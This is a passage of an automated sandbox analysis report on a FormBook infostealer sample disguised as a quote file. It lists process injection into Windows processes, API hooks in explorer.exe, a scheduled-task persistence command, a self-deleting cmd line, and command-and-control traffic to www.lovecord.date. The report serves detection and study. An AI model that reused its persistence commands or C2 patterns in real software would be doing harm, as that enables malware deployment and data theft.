                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x8580c0x85a00False0.891785181829data7.67621668489IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x880000x5e40x600False0.429036458333data4.19079250393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x8a0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0x880900x352data
                                                  RT_MANIFEST0x883f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright Flexus
                                                  Assembly Version133.4.11.4
                                                  InternalNameRangeWork.exe
                                                  FileVersion133.4.11.0
                                                  CompanyNameFlexus
                                                  LegalTrademarks
                                                  Comments
                                                  ProductNameCheeeeeeeeese
                                                  ProductVersion133.4.11.0
                                                  FileDescriptionCheeeeeeeeese
                                                  OriginalFilenameRangeWork.exe

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 15, 2021 13:51:50.132740021 CEST4984180192.168.2.444.227.76.166
                                                  Sep 15, 2021 13:51:50.310981989 CEST804984144.227.76.166192.168.2.4
                                                  Sep 15, 2021 13:51:50.311153889 CEST4984180192.168.2.444.227.76.166
                                                  Sep 15, 2021 13:51:50.497129917 CEST804984144.227.76.166192.168.2.4
                                                  Sep 15, 2021 13:51:50.497225046 CEST4984180192.168.2.444.227.76.166
                                                  Sep 15, 2021 13:51:50.673759937 CEST804984144.227.76.166192.168.2.4
                                                  Sep 15, 2021 13:51:50.677776098 CEST804984144.227.76.166192.168.2.4
                                                  Sep 15, 2021 13:51:50.677805901 CEST804984144.227.76.166192.168.2.4
                                                  Sep 15, 2021 13:51:50.678009987 CEST4984180192.168.2.444.227.76.166
                                                  Sep 15, 2021 13:51:50.678092003 CEST4984180192.168.2.444.227.76.166
                                                  Sep 15, 2021 13:51:50.854578972 CEST804984144.227.76.166192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 15, 2021 13:50:05.696639061 CEST4925753192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:50:05.723517895 CEST53492578.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:50:37.651396990 CEST6238953192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:50:37.689045906 CEST53623898.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:50:57.215151072 CEST4991053192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:50:57.281522036 CEST53499108.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:50:59.046032906 CEST5585453192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:50:59.074213028 CEST53558548.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:50:59.345243931 CEST6454953192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:50:59.401603937 CEST53645498.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:50:59.970310926 CEST6315353192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:00.002815008 CEST53631538.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:00.451961994 CEST5299153192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:00.506484032 CEST53529918.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:00.583204985 CEST5370053192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:00.624830961 CEST53537008.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:01.424560070 CEST5172653192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:01.454725027 CEST53517268.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:02.006853104 CEST5679453192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:02.049448967 CEST53567948.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:03.537743092 CEST5653453192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:03.570261955 CEST53565348.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:04.787090063 CEST5662753192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:04.813617945 CEST53566278.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:05.900957108 CEST5662153192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:05.948797941 CEST53566218.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:06.665857077 CEST6311653192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:06.690716982 CEST53631168.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:24.701564074 CEST6407853192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:24.730184078 CEST53640788.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:48.548394918 CEST6480153192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:48.578449965 CEST53648018.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:49.930634975 CEST6172153192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:50.126816988 CEST53617218.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:51:50.424192905 CEST5125553192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:51:50.462699890 CEST53512558.8.8.8192.168.2.4
                                                  Sep 15, 2021 13:52:10.904135942 CEST6152253192.168.2.48.8.8.8
                                                  Sep 15, 2021 13:52:10.950427055 CEST53615228.8.8.8192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Sep 15, 2021 13:51:49.930634975 CEST192.168.2.48.8.8.80x4893Standard query (0)www.lovecord.dateA (IP address)IN (0x0001)
                                                  Sep 15, 2021 13:52:10.904135942 CEST192.168.2.48.8.8.80x7c6eStandard query (0)www.neuralviolin.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Sep 15, 2021 13:51:50.126816988 CEST8.8.8.8192.168.2.40x4893No error (0)www.lovecord.date44.227.76.166A (IP address)IN (0x0001)
                                                  Sep 15, 2021 13:51:50.126816988 CEST8.8.8.8192.168.2.40x4893No error (0)www.lovecord.date44.227.65.245A (IP address)IN (0x0001)
                                                  Sep 15, 2021 13:52:10.950427055 CEST8.8.8.8192.168.2.40x7c6eName error (3)www.neuralviolin.comnonenoneA (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.lovecord.date

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.44984144.227.76.16680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Sep 15, 2021 13:51:50.497225046 CEST5710OUTGET /vd9n/?NfB=6+C1z2NTXQU5TtDgYCNVveFhDHAhXY7UdOammGZxKywecd1Rk4eK0uo6Q7X2XlF/f8Go&o87p=d640H6WhXv9 HTTP/1.1
                                                  Host: www.lovecord.date
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 13:51:50.677776098 CEST5715INHTTP/1.1 307 Temporary Redirect
                                                  Server: openresty
                                                  Date: Wed, 15 Sep 2021 11:51:50 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 168
                                                  Connection: close
                                                  Location: http://lovecord.date
                                                  X-Frame-Options: sameorigin
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEC
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEC
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEC
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEC

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:13:50:10
                                                  Start date:15/09/2021
                                                  Path:C:\Users\user\Desktop\Quote#56432.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\Quote#56432.exe'
                                                  Imagebase:0x680000
                                                  File size:549888 bytes
                                                  MD5 hash:3812EBC395330BEF949CC2C7264D1632
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:13:50:24
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp'
                                                  Imagebase:0xdb0000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:13:50:24
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:13:50:24
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Imagebase:0xe90000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:13:50:26
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff6fee60000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:13:51:06
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\systray.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\systray.exe
                                                  Imagebase:0xc70000
                                                  File size:9728 bytes
                                                  MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:13:51:09
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                  Imagebase:0x11d0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:13:51:10
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >